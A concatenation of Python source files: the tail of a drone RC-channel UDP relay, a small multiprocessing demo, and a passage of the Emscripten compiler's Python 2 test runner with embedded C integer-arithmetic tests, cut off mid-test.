rc_actual = [1500, 1500, 900, 1500, 0, 0, 0, 0]
def listener():
global rc_sock, rc_actual
sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
sock.bind(('0.0.0.0', 13341))
while True:
try:
data = sock.recv( 1000 )
if data == None or len(data) != rc_pkt.LENGTH:
continue
(timestamp, sequence, chan) = rc_pkt.unpack(data)
rc_actual = [chan[2], chan[1], chan[0], chan[3], chan[4], chan[5], chan[6], chan[7]]
except Exception as e:
print(e)
if rc_sock == None:
return
t_l = Thread(target=listener)
t_l.daemon = True
t_l.start()
def sender():
global rc_sock, rc_override, rc_attached
while True:
time.sleep(.020)
pkt = struct.pack('<HHHHHHHH', *(rc_override if rc_attached else rc_actual))
try:
# print('--->', rc_attached, rc_override if rc_attached else rc_actual)
rc_sock.sendto(pkt, ('127.0.0.1', 5501))
except Exception as e:
print(e)
if rc_sock == None:
return
t_s = Thread(target=sender)
t_s.daemon = True
t_s.start()
def pixrc_stop():
global rc_sock
if rc_sock:
rc_sock.close()
rc_sock = None
|
multiProcessTest.py
|
import multiprocessing
import time
import os
def work():
for _ in range(10):
print("work..")
print(multiprocessing.current_process())
print(f"subprocess pid: {multiprocessing.current_process().pid}")
print(f"parent process pid: {os.getppid()}")
time.sleep(0.2)
if __name__ == "__main__":
process_obj = multiprocessing.Process(target=work)
process_obj.start()
for i in range(9):
print(f"main processing: {multiprocessing.current_process()}")
print(f"main processing pid: {multiprocessing.current_process().pid}")
time.sleep(0.2)
|
runner.py
|
#!/usr/bin/env python2
# This Python file uses the following encoding: utf-8
'''
Simple test runner
These tests can be run in parallel using nose, for example
nosetests --processes=4 -v -s tests/runner.py
will use 4 processes. To install nose do something like
|pip install nose| or |sudo apt-get install python-nose|.
Note however that emcc now uses multiple cores when optimizing,
so you may prefer to use fewer cores here.
'''
from subprocess import Popen, PIPE, STDOUT
import os, unittest, tempfile, shutil, time, inspect, sys, math, glob, re, difflib, webbrowser, hashlib, threading, platform, BaseHTTPServer, multiprocessing, functools, stat
if len(sys.argv) == 1:
print '''
==============================================================================
Running the main part of the test suite. Don't forget to run the other parts!
sanity - tests for first run, etc., modifies ~/.emscripten
benchmark - run before and after each set of changes before pushing to
master, verify no regressions
browser - runs pages in a web browser
To run one of those parts, do something like
python tests/runner.py sanity
To run a specific set of tests, you can do things like
python tests/runner.py o1
(that runs the o1 (-O1) tests). You can run individual tests with
python tests/runner.py test_hello_world
Combinations work too, for example
python tests/runner.py browser.test_sdl_image
In the main test suite, you can run all variations (O0, O1, O2, etc.) of
an individual test with
python tests/runner.py ALL.test_hello_world
==============================================================================
'''
time.sleep(2)
# Setup
__rootpath__ = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def path_from_root(*pathelems):
return os.path.join(__rootpath__, *pathelems)
sys.path += [path_from_root(''), path_from_root('third_party/websockify')]
import tools.shared
from tools.shared import *
# Sanity check for config
try:
assert COMPILER_OPTS != None
except:
raise Exception('Cannot find "COMPILER_OPTS" definition. Is %s set up properly? You may need to copy the template settings file into it.' % EM_CONFIG)
# Core test runner class, shared between normal tests and benchmarks
checked_sanity = False
class RunnerCore(unittest.TestCase):
save_dir = os.environ.get('EM_SAVE_DIR')
save_JS = 0
stderr_redirect = STDOUT # This avoids cluttering the test runner output, which is stderr too, with compiler warnings etc.
# Change this to None to get stderr reporting, for debugging purposes
env = {}
def skipme(self): # used by tests we ask on the commandline to be skipped, see right before call to unittest.main
return self.skip('requested to be skipped')
def setUp(self):
global Settings
Settings.reset()
Settings = tools.shared.Settings
self.banned_js_engines = []
if not self.save_dir:
dirname = tempfile.mkdtemp(prefix='emscripten_test_' + self.__class__.__name__ + '_', dir=TEMP_DIR)
else:
dirname = CANONICAL_TEMP_DIR
if not os.path.exists(dirname):
os.makedirs(dirname)
self.working_dir = dirname
os.chdir(dirname)
if not self.save_dir:
self.has_prev_ll = False
for temp_file in os.listdir(TEMP_DIR):
if temp_file.endswith('.ll'):
self.has_prev_ll = True
def tearDown(self):
if not self.save_dir:
# rmtree() fails on Windows if the current working directory is inside the tree.
os.chdir(os.path.join(self.get_dir(), '..'))
shutil.rmtree(self.get_dir())
# Make sure we don't leave stuff around
#if not self.has_prev_ll:
# for temp_file in os.listdir(TEMP_DIR):
# assert not temp_file.endswith('.ll'), temp_file
# # TODO assert not temp_file.startswith('emscripten_'), temp_file
def skip(self, why):
print >> sys.stderr, '<skipping: %s> ' % why,
def get_dir(self):
return self.working_dir
def in_dir(self, *pathelems):
return os.path.join(self.get_dir(), *pathelems)
def get_stdout_path(self):
return os.path.join(self.get_dir(), 'stdout')
def hardcode_arguments(self, filename, args):
# Hardcode in the arguments, so js is portable without manual commandlinearguments
if not args: return
js = open(filename).read()
open(filename, 'w').write(js.replace('run();', 'run(%s + Module["arguments"]);' % str(args)))
def prep_ll_run(self, filename, ll_file, force_recompile=False, build_ll_hook=None):
if ll_file.endswith(('.bc', '.o')):
if ll_file != filename + '.o':
shutil.copy(ll_file, filename + '.o')
Building.llvm_dis(filename)
else:
shutil.copy(ll_file, filename + '.o.ll')
#force_recompile = force_recompile or os.stat(filename + '.o.ll').st_size > 50000 # if the file is big, recompile just to get ll_opts # Recompiling just for dfe in ll_opts is too costly
if Building.LLVM_OPTS or force_recompile or build_ll_hook:
Building.ll_opts(filename)
if build_ll_hook:
need_post = build_ll_hook(filename)
Building.llvm_as(filename)
shutil.move(filename + '.o.ll', filename + '.o.ll.pre') # for comparisons later
if Building.LLVM_OPTS:
Building.llvm_opts(filename)
Building.llvm_dis(filename)
if build_ll_hook and need_post:
build_ll_hook(filename)
Building.llvm_as(filename)
shutil.move(filename + '.o.ll', filename + '.o.ll.post') # for comparisons later
Building.llvm_dis(filename)
# Generate JS from ll, and optionally modify the generated JS with a post_build function. Note
# that post_build is called on unoptimized JS, so we send it to emcc (otherwise, if run after
# emcc, it would not apply on the optimized/minified JS)
def ll_to_js(self, filename, extra_emscripten_args, post_build):
if type(post_build) in (list, tuple):
post1, post2 = post_build
else:
post1 = post_build
post2 = None
if self.emcc_args is None:
Building.emscripten(filename, append_ext=True, extra_args=extra_emscripten_args)
if post1:
exec post1 in locals()
shutil.copyfile(filename + '.o.js', filename + '.o.js.prepost.js')
process(filename + '.o.js')
if post2: post2(filename + '.o.js')
else:
transform_args = []
if post1:
transform_filename = os.path.join(self.get_dir(), 'transform.py')
transform = open(transform_filename, 'w')
transform.write('''
import sys
sys.path += [%r]
''' % path_from_root(''))
transform.write(post1)
transform.write('''
process(sys.argv[1])
''')
transform.close()
transform_args = ['--js-transform', "%s %s" % (PYTHON, transform_filename)]
Building.emcc(filename + '.o.ll', Settings.serialize() + self.emcc_args + transform_args + Building.COMPILER_TEST_OPTS, filename + '.o.js')
if post2: post2(filename + '.o.js')
# Build JavaScript code from source code
def build(self, src, dirname, filename, output_processor=None, main_file=None, additional_files=[], libraries=[], includes=[], build_ll_hook=None, extra_emscripten_args=[], post_build=None):
Building.pick_llvm_opts(3) # pick llvm opts here, so we include changes to Settings in the test case code
# Copy over necessary files for compiling the source
if main_file is None:
f = open(filename, 'w')
f.write(src)
f.close()
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = map(lambda f: os.path.join(dirname, f), additional_files)
os.chdir(self.get_dir())
# C++ => LLVM binary
for f in [filename] + additional_files:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except:
pass
args = [PYTHON, EMCC] + Building.COMPILER_TEST_OPTS + Settings.serialize() + \
['-I', dirname, '-I', os.path.join(dirname, 'include')] + \
map(lambda include: '-I' + include, includes) + \
['-c', f, '-o', f + '.o']
output = Popen(args, stdout=PIPE, stderr=self.stderr_redirect if not DEBUG else None).communicate()[0]
assert os.path.exists(f + '.o'), 'Source compilation error: ' + output
# Link all files
if len(additional_files) + len(libraries) > 0:
shutil.move(filename + '.o', filename + '.o.alone')
Building.link([filename + '.o.alone'] + map(lambda f: f + '.o', additional_files) + libraries,
filename + '.o')
if not os.path.exists(filename + '.o'):
print "Failed to link LLVM binaries:\n\n", output
raise Exception("Linkage error");
# Finalize
self.prep_ll_run(filename, filename + '.o', build_ll_hook=build_ll_hook)
# BC => JS
self.ll_to_js(filename, extra_emscripten_args, post_build)
if output_processor is not None:
output_processor(open(filename + '.o.js').read())
if self.emcc_args is not None and 'ASM_JS=1' in self.emcc_args:
if '--memory-init-file' in self.emcc_args:
memory_init_file = int(self.emcc_args[self.emcc_args.index('--memory-init-file')+1])
else:
memory_init_file = 0
if memory_init_file:
assert '/* memory initializer */' not in open(filename + '.o.js').read()
else:
assert 'memory initializer */' in open(filename + '.o.js').read()
def validate_asmjs(self, err):
if 'uccessfully compiled asm.js code' in err and 'asm.js link error' not in err:
print >> sys.stderr, "[was asm.js'ified]"
elif 'asm.js' in err: # if no asm.js error, then not an odin build
raise Exception("did NOT asm.js'ify")
def run_generated_code(self, engine, filename, args=[], check_timeout=True, output_nicerizer=None):
stdout = os.path.join(self.get_dir(), 'stdout') # use files, as PIPE can get too full and hang us
stderr = os.path.join(self.get_dir(), 'stderr')
try:
cwd = os.getcwd()
except:
cwd = None
os.chdir(self.get_dir())
run_js(filename, engine, args, check_timeout, stdout=open(stdout, 'w'), stderr=open(stderr, 'w'))
if cwd is not None:
os.chdir(cwd)
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if engine == SPIDERMONKEY_ENGINE and Settings.ASM_JS:
self.validate_asmjs(err)
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
assert 'strict warning:' not in ret, 'We should pass all strict mode checks: ' + ret
return ret
def build_native(self, filename, args=[]):
compiler = CLANG if filename.endswith('cpp') else CLANG_CC
process = Popen([compiler, '-O2', '-fno-math-errno', filename, '-o', filename+'.native'] + args, stdout=PIPE, stderr=self.stderr_redirect)
output = process.communicate()
if process.returncode is not 0:
print >> sys.stderr, "Building native executable with command '%s' failed with a return code %d!" % (' '.join([CLANG, '-O2', filename, '-o', filename+'.native']), process.returncode)
print "Output: " + output[0]
def run_native(self, filename, args):
process = Popen([filename+'.native'] + args, stdout=PIPE);
output = process.communicate()
if process.returncode is not 0:
print >> sys.stderr, "Running native executable with command '%s' failed with a return code %d!" % (' '.join([filename+'.native'] + args), process.returncode)
print "Output: " + output[0]
return output[0]
def assertIdentical(self, values, y):
if type(values) not in [list, tuple]: values = [values]
for x in values:
if x == y: return # success
raise Exception("Expected to have '%s' == '%s', diff:\n\n%s" % (
limit_size(values[0]), limit_size(y),
limit_size(''.join([a.rstrip()+'\n' for a in difflib.unified_diff(x.split('\n'), y.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]: values = [values]
for value in values:
if type(string) is not str: string = string()
if value in string: return # success
raise Exception("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string),
limit_size(''.join([a.rstrip()+'\n' for a in difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')])),
additional_info
))
def assertNotContained(self, value, string):
if type(value) is not str: value = value() # lazy loading
if type(string) is not str: string = string()
if value in string:
raise Exception("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip()+'\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
if not os.path.exists(ret):
os.makedirs(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'], configure_args=[], make=['make'], make_args=['-j', '2'], cache=True, env_init={}, cache_name_extra='', native=False):
build_dir = self.get_build_dir()
output_dir = self.get_dir()
cache_name = name + cache_name_extra + (self.env.get('EMCC_LLVM_TARGET') or '')
if self.library_cache is not None:
if cache and self.library_cache.get(cache_name):
print >> sys.stderr, '<load %s from cache> ' % cache_name,
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
f = open(bc_file, 'wb')
f.write(contents)
f.close()
generated_libs.append(bc_file)
return generated_libs
print >> sys.stderr, '<building and saving %s into cache> ' % cache_name,
return Building.build_library(name, build_dir, output_dir, generated_libs, configure, configure_args, make, make_args, self.library_cache, cache_name,
copy_project=True, env_init=env_init, native=native)
def clear(self, in_curr=False):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name) if not in_curr else name)
emcc_debug = os.environ.get('EMCC_DEBUG')
if emcc_debug and not in_curr:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
# Shared test code between main suite and others
def setup_runtimelink_test(self):
header = r'''
struct point
{
int x, y;
};
'''
open(os.path.join(self.get_dir(), 'header.h'), 'w').write(header)
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x+p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
supp_name = os.path.join(self.get_dir(), 'supp.cpp')
open(supp_name, 'w').write(supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
int result = suppInt;
REPORT_RESULT();
#endif
return 0;
}
'''
return (main, supp)
###################################################################################################
sys.argv = map(lambda arg: arg if not arg.startswith('test_') else 'default.' + arg, sys.argv)
test_modes = ['default', 'o1', 'o2', 'asm1', 'asm2', 'asm2g', 'asm2x86', 's_0_0', 's_0_1']
test_index = 0
if 'benchmark' not in str(sys.argv) and 'sanity' not in str(sys.argv) and 'browser' not in str(sys.argv):
# Tests
print "Running Emscripten tests..."
if len(sys.argv) == 2 and sys.argv[1].startswith('ALL.'):
ignore, test = sys.argv[1].split('.')
print 'Running all test modes on test "%s"' % test
sys.argv = [sys.argv[0]] + map(lambda mode: mode+'.'+test, test_modes)
class T(RunnerCore): # Short name, to make it more fun to use manually on the commandline
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None, output_processor=None, no_build=False, main_file=None, additional_files=[], js_engines=None, post_build=None, basename='src.cpp', libraries=[], includes=[], force_c=False, build_ll_hook=None, extra_emscripten_args=[]):
if force_c or (main_file is not None and main_file[-2:]) == '.c':
basename = 'src.c'
Building.COMPILER = to_cc(Building.COMPILER)
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
if not no_build:
self.build(src, dirname, filename, main_file=main_file, additional_files=additional_files, libraries=libraries, includes=includes,
build_ll_hook=build_ll_hook, extra_emscripten_args=extra_emscripten_args, post_build=post_build)
# Run in both JavaScript engines, if optimizing - significant differences there (typed arrays)
if js_engines is None:
js_engines = JS_ENGINES
if Settings.USE_TYPED_ARRAYS:
js_engines = filter(lambda engine: engine != V8_ENGINE, js_engines) # V8 issue 1822
js_engines = filter(lambda engine: engine not in self.banned_js_engines, js_engines)
if len(js_engines) == 0: return self.skip('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in js_engines:
js_output = self.run_generated_code(engine, filename + '.o.js', args, output_nicerizer=output_nicerizer)
self.assertContained(expected_output, js_output.replace('\r\n', '\n'))
self.assertNotContained('ERROR', js_output)
#shutil.rmtree(dirname) # TODO: leave no trace in memory. But for now nice for debugging
if self.save_JS:
global test_index
self.hardcode_arguments(filename + '.o.js', args)
shutil.copyfile(filename + '.o.js', os.path.join(TEMP_DIR, str(test_index) + '.js'))
test_index += 1
# No building - just process an existing .ll file (or .bc, which we turn into .ll)
def do_ll_run(self, ll_file, expected_output=None, args=[], js_engines=None, output_nicerizer=None, post_build=None, force_recompile=False, build_ll_hook=None, extra_emscripten_args=[]):
filename = os.path.join(self.get_dir(), 'src.cpp')
self.prep_ll_run(filename, ll_file, force_recompile, build_ll_hook)
self.ll_to_js(filename, extra_emscripten_args, post_build)
self.do_run(None,
expected_output,
args,
no_build=True,
js_engines=js_engines,
output_nicerizer=output_nicerizer,
post_build=None) # post_build was already done in ll_to_js, this do_run call is just to test the output
def is_le32(self):
return not ('i386-pc-linux-gnu' in COMPILER_OPTS or self.env.get('EMCC_LLVM_TARGET') == 'i386-pc-linux-gnu')
def test_hello_world(self):
src = '''
#include <stdio.h>
int main()
{
printf("hello, world!\\n");
return 0;
}
'''
self.do_run(src, 'hello, world!')
assert 'EMSCRIPTEN_GENERATED_FUNCTIONS' not in open(self.in_dir('src.cpp.o.js')).read(), 'must not emit this unneeded internal thing'
def test_intvars(self):
if self.emcc_args == None: return self.skip('needs ta2')
src = '''
#include <stdio.h>
int global = 20;
int *far;
int main()
{
int x = 5;
int y = x+17;
int z = (y-1)/2; // Should stay an integer after division!
y += 1;
int w = x*3+4;
int k = w < 15 ? 99 : 101;
far = &k;
*far += global;
int i = k > 100; // Should be an int, not a bool!
int j = i << 6;
j >>= 1;
j = j ^ 5;
int h = 1;
h |= 0;
int p = h;
p &= 0;
printf("*%d,%d,%d,%d,%d,%d,%d,%d,%d*\\n", x, y, z, w, k, i, j, h, p);
long hash = -1;
size_t perturb;
int ii = 0;
for (perturb = hash; ; perturb >>= 5) {
printf("%d:%d", ii, perturb);
ii++;
if (ii == 9) break;
printf(",");
}
printf("*\\n");
printf("*%.1d,%.2d*\\n", 56, 9);
// Fixed-point math on 64-bit ints. Tricky to support since we have no 64-bit shifts in JS
{
struct Fixed {
static int Mult(int a, int b) {
return ((long long)a * (long long)b) >> 16;
}
};
printf("fixed:%d\\n", Fixed::Mult(150000, 140000));
}
printf("*%ld*%p\\n", (long)21, &hash); // The %p should not enter an infinite loop!
return 0;
}
'''
self.do_run(src, '*5,23,10,19,121,1,37,1,0*\n0:-1,1:134217727,2:4194303,3:131071,4:4095,5:127,6:3,7:0,8:0*\n*56,09*\nfixed:320434\n*21*')
def test_sintvars(self):
Settings.CORRECT_SIGNS = 1 # Relevant to this test
src = '''
#include <stdio.h>
struct S {
char *match_start;
char *strstart;
};
int main()
{
struct S _s;
struct S *s = &_s;
unsigned short int sh;
s->match_start = (char*)32522;
s->strstart = (char*)(32780);
printf("*%d,%d,%d*\\n", (int)s->strstart, (int)s->match_start, (int)(s->strstart - s->match_start));
sh = s->strstart - s->match_start;
printf("*%d,%d*\\n", sh, sh>>7);
s->match_start = (char*)32999;
s->strstart = (char*)(32780);
printf("*%d,%d,%d*\\n", (int)s->strstart, (int)s->match_start, (int)(s->strstart - s->match_start));
sh = s->strstart - s->match_start;
printf("*%d,%d*\\n", sh, sh>>7);
}
'''
output = '*32780,32522,258*\n*258,2*\n*32780,32999,-219*\n*65317,510*'
Settings.CORRECT_OVERFLOWS = 0 # We should not need overflow correction to get this right
self.do_run(src, output, force_c=True)
def test_i64(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('i64 mode 1 requires ta2')
src = '''
#include <stdio.h>
int main()
{
long long a = 0x2b00505c10;
long long b = a >> 29;
long long c = a >> 32;
long long d = a >> 34;
printf("*%Ld,%Ld,%Ld,%Ld*\\n", a, b, c, d);
unsigned long long ua = 0x2b00505c10;
unsigned long long ub = ua >> 29;
unsigned long long uc = ua >> 32;
unsigned long long ud = ua >> 34;
printf("*%Ld,%Ld,%Ld,%Ld*\\n", ua, ub, uc, ud);
long long x = 0x0000def123450789ULL; // any bigger than this, and we
long long y = 0x00020ef123456089ULL; // start to run into the double precision limit!
printf("*%Ld,%Ld,%Ld,%Ld,%Ld*\\n", x, y, x | y, x & y, x ^ y, x >> 2, y << 2);
printf("*");
long long z = 13;
int n = 0;
while (z > 1) {
printf("%.2f,", (float)z); // these must be integers!
z = z >> 1;
n++;
}
printf("*%d*\\n", n);
return 0;
}
'''
self.do_run(src, '*184688860176,344,43,10*\n*184688860176,344,43,10*\n*245127260211081,579378795077769,808077213656969,16428841631881,791648372025088*\n*13.00,6.00,3.00,*3*')
src = r'''
#include <time.h>
#include <stdio.h>
#include <stdint.h>
int64_t returner1() { return 0x0000def123450789ULL; }
int64_t returner2(int test) {
while (test > 10) test /= 2; // confuse the compiler so it doesn't eliminate this function
return test > 5 ? 0x0000def123450123ULL : 0ULL;
}
void modifier1(int64_t t) {
t |= 12;
printf("m1: %Ld\n", t);
}
void modifier2(int64_t &t) {
t |= 12;
}
int truthy() {
int x = time(0);
while (x > 10) {
x |= 7;
x /= 2;
}
return x < 3;
}
struct IUB {
int c;
long long d;
};
IUB iub[] = {
{ 55, 17179869201 },
{ 122, 25769803837 },
};
int main(int argc, char **argv)
{
int64_t x1 = 0x1234def123450789ULL;
int64_t x2 = 0x1234def123450788ULL;
int64_t x3 = 0x1234def123450789ULL;
printf("*%Ld\n%d,%d,%d,%d,%d\n%d,%d,%d,%d,%d*\n", x1, x1==x2, x1<x2, x1<=x2, x1>x2, x1>=x2, // note: some rounding in the printing!
x1==x3, x1<x3, x1<=x3, x1>x3, x1>=x3);
printf("*%Ld*\n", returner1());
printf("*%Ld*\n", returner2(30));
uint64_t maxx = -1ULL;
printf("*%Lu*\n*%Lu*\n", maxx, maxx >> 5);
// Make sure params are not modified if they shouldn't be
int64_t t = 123;
modifier1(t);
printf("*%Ld*\n", t);
modifier2(t);
printf("*%Ld*\n", t);
// global structs with i64s
printf("*%d,%Ld*\n*%d,%Ld*\n", iub[0].c, iub[0].d, iub[1].c, iub[1].d);
// Bitshifts
{
int64_t a = -1;
int64_t b = a >> 29;
int64_t c = a >> 32;
int64_t d = a >> 34;
printf("*%Ld,%Ld,%Ld,%Ld*\n", a, b, c, d);
uint64_t ua = -1;
int64_t ub = ua >> 29;
int64_t uc = ua >> 32;
int64_t ud = ua >> 34;
printf("*%Ld,%Ld,%Ld,%Ld*\n", ua, ub, uc, ud);
}
// Nonconstant bitshifts
{
int64_t a = -1;
int64_t b = a >> (29 - argc + 1);
int64_t c = a >> (32 - argc + 1);
int64_t d = a >> (34 - argc + 1);
printf("*%Ld,%Ld,%Ld,%Ld*\n", a, b, c, d);
uint64_t ua = -1;
int64_t ub = ua >> (29 - argc + 1);
int64_t uc = ua >> (32 - argc + 1);
int64_t ud = ua >> (34 - argc + 1);
printf("*%Ld,%Ld,%Ld,%Ld*\n", ua, ub, uc, ud);
}
// Math mixtures with doubles
{
uint64_t a = 5;
double b = 6.8;
uint64_t c = a * b;
if (truthy()) printf("*%d,%d,%d*\n", (int)&a, (int)&b, (int)&c); // printing addresses prevents optimizations
printf("*prod:%llu*\n", c);
}
// Basic (rounded, for now) math. Just check compilation.
int64_t a = 0x1234def123450789ULL;
a--; if (truthy()) a--; // confuse optimizer
int64_t b = 0x1234000000450789ULL;
b++; if (truthy()) b--; // confuse optimizer
printf("*%Ld,%Ld,%Ld,%Ld*\n", (a+b)/5000, (a-b)/5000, (a*3)/5000, (a/5)/5000);
a -= 17; if (truthy()) a += 5; // confuse optimizer
b -= 17; if (truthy()) b += 121; // confuse optimizer
printf("*%Lx,%Lx,%Lx,%Lx*\n", b - a, b - a/2, b/2 - a, b - 20);
if (truthy()) a += 5/b; // confuse optimizer
if (truthy()) b += 121*(3+a/b); // confuse optimizer
printf("*%Lx,%Lx,%Lx,%Lx*\n", a - b, a - b/2, a/2 - b, a - 20);
return 0;
}
'''
self.do_run(src, '*1311918518731868041\n' +
'0,0,0,1,1\n' +
'1,0,1,0,1*\n' +
'*245127260211081*\n' +
'*245127260209443*\n' +
'*18446744073709551615*\n' +
'*576460752303423487*\n' +
'm1: 127\n' +
'*123*\n' +
'*127*\n' +
'*55,17179869201*\n' +
'*122,25769803837*\n' +
'*-1,-1,-1,-1*\n' +
'*-1,34359738367,4294967295,1073741823*\n' +
'*-1,-1,-1,-1*\n' +
'*-1,34359738367,4294967295,1073741823*\n' +
'*prod:34*\n' +
'*524718382041609,49025451137,787151111239120,52476740749274*\n' +
'*ffff210edd000002,91990876ea283be,f6e5210edcdd7c45,1234000000450765*\n' +
'*def122fffffe,91adef1232283bb,f6e66f78915d7c42,1234def123450763*\n')
src = r'''
#include <stdio.h>
#include <limits>
int main()
{
long long i,j,k;
i = 0;
j = -1,
k = 1;
printf( "*\n" );
printf( "%s\n", i > j ? "Ok": "Fail" );
printf( "%s\n", k > i ? "Ok": "Fail" );
printf( "%s\n", k > j ? "Ok": "Fail" );
printf( "%s\n", i < j ? "Fail": "Ok" );
printf( "%s\n", k < i ? "Fail": "Ok" );
printf( "%s\n", k < j ? "Fail": "Ok" );
printf( "%s\n", (i-j) >= k ? "Ok": "Fail" );
printf( "%s\n", (i-j) <= k ? "Ok": "Fail" );
printf( "%s\n", i > std::numeric_limits<long long>::min() ? "Ok": "Fail" );
printf( "%s\n", i < std::numeric_limits<long long>::max() ? "Ok": "Fail" );
printf( "*\n" );
}
'''
self.do_run(src, '*\nOk\nOk\nOk\nOk\nOk\nOk\nOk\nOk\nOk\nOk\n*')
# stuff that also needs sign corrections
Settings.CORRECT_SIGNS = 1
src = r'''
#include <stdio.h>
#include <stdint.h>
int main()
{
// i32 vs i64
int32_t small = -1;
int64_t large = -1;
printf("*%d*\n", small == large);
small++;
printf("*%d*\n", small == large);
uint32_t usmall = -1;
uint64_t ularge = -1;
printf("*%d*\n", usmall == ularge);
return 0;
}
'''
self.do_run(src, '*1*\n*0*\n*0*\n')
def test_i64_b(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdio.h>
#include <sys/time.h>
typedef long long int64;
#define PRMJ_USEC_PER_SEC 1000000L
int main(int argc, char * argv[]) {
int64 sec = 1329409675 + argc;
int64 usec = 2329509675;
int64 mul = int64(sec) * PRMJ_USEC_PER_SEC;
int64 add = mul + int64(usec);
int add_low = add;
int add_high = add >> 32;
printf("*%lld,%lld,%u,%u*\n", mul, add, add_low, add_high);
int64 x = sec + (usec << 25);
x >>= argc*3;
printf("*%llu*\n", x);
return 0;
}
'''
self.do_run(src, '*1329409676000000,1329412005509675,3663280683,309527*\n*9770671914067409*\n')
def test_i64_cmp(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdio.h>
typedef long long int64;
bool compare(int64 val) {
return val == -12;
}
bool compare2(int64 val) {
return val < -12;
}
int main(int argc, char * argv[]) {
printf("*%d,%d,%d,%d,%d,%d*\n", argc, compare(argc-1-12), compare(1000+argc), compare2(argc-1-10), compare2(argc-1-14), compare2(argc+1000));
return 0;
}
'''
self.do_run(src, '*1,1,0,0,1,0*\n')
def test_i64_cmp2(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <inttypes.h>
#include <stdio.h>
typedef int32_t INT32;
typedef int64_t INT64;
typedef uint8_t UINT8;
void interface_clock_changed()
{
UINT8 m_divshift;
INT32 m_divisor;
//INT64 attos = m_attoseconds_per_cycle;
INT64 attos = 279365114840;
m_divshift = 0;
while (attos >= (1UL << 31))
{
m_divshift++;
printf("m_divshift is %i, on %Ld >?= %lu\n", m_divshift, attos, 1UL << 31);
attos >>= 1;
}
m_divisor = attos;
printf("m_divisor is %i\n",m_divisor);
}
int main() {
interface_clock_changed();
return 0;
}
'''
self.do_run(src, '''m_divshift is 1, on 279365114840 >?= 2147483648
m_divshift is 2, on 139682557420 >?= 2147483648
m_divshift is 3, on 69841278710 >?= 2147483648
m_divshift is 4, on 34920639355 >?= 2147483648
m_divshift is 5, on 17460319677 >?= 2147483648
m_divshift is 6, on 8730159838 >?= 2147483648
m_divshift is 7, on 4365079919 >?= 2147483648
m_divshift is 8, on 2182539959 >?= 2147483648
m_divisor is 1091269979
''')
def test_i64_double(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdio.h>
typedef long long int64;
#define JSDOUBLE_HI32_SIGNBIT 0x80000000
bool JSDOUBLE_IS_NEGZERO(double d)
{
union {
struct {
unsigned int lo, hi;
} s;
double d;
} x;
if (d != 0)
return false;
x.d = d;
return (x.s.hi & JSDOUBLE_HI32_SIGNBIT) != 0;
}
bool JSINT64_IS_NEGZERO(int64 l)
{
union {
int64 i;
double d;
} x;
if (l != 0)
return false;
x.i = l;
return x.d == -0;
}
int main(int argc, char * argv[]) {
printf("*%d,%d,%d,%d*\n", JSDOUBLE_IS_NEGZERO(0), JSDOUBLE_IS_NEGZERO(-0), JSDOUBLE_IS_NEGZERO(-1), JSDOUBLE_IS_NEGZERO(+1));
printf("*%d,%d,%d,%d*\n", JSINT64_IS_NEGZERO(0), JSINT64_IS_NEGZERO(-0), JSINT64_IS_NEGZERO(-1), JSINT64_IS_NEGZERO(+1));
return 0;
}
'''
self.do_run(src, '*0,0,0,0*\n*1,1,0,0*\n') # same as gcc
def test_i64_umul(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <inttypes.h>
#include <stdio.h>
typedef uint32_t UINT32;
typedef uint64_t UINT64;
int main() {
volatile UINT32 testu32a = 2375724032U;
UINT32 bigu32 = 0xffffffffU;
volatile UINT64 testu64a = 14746250828952703000U;
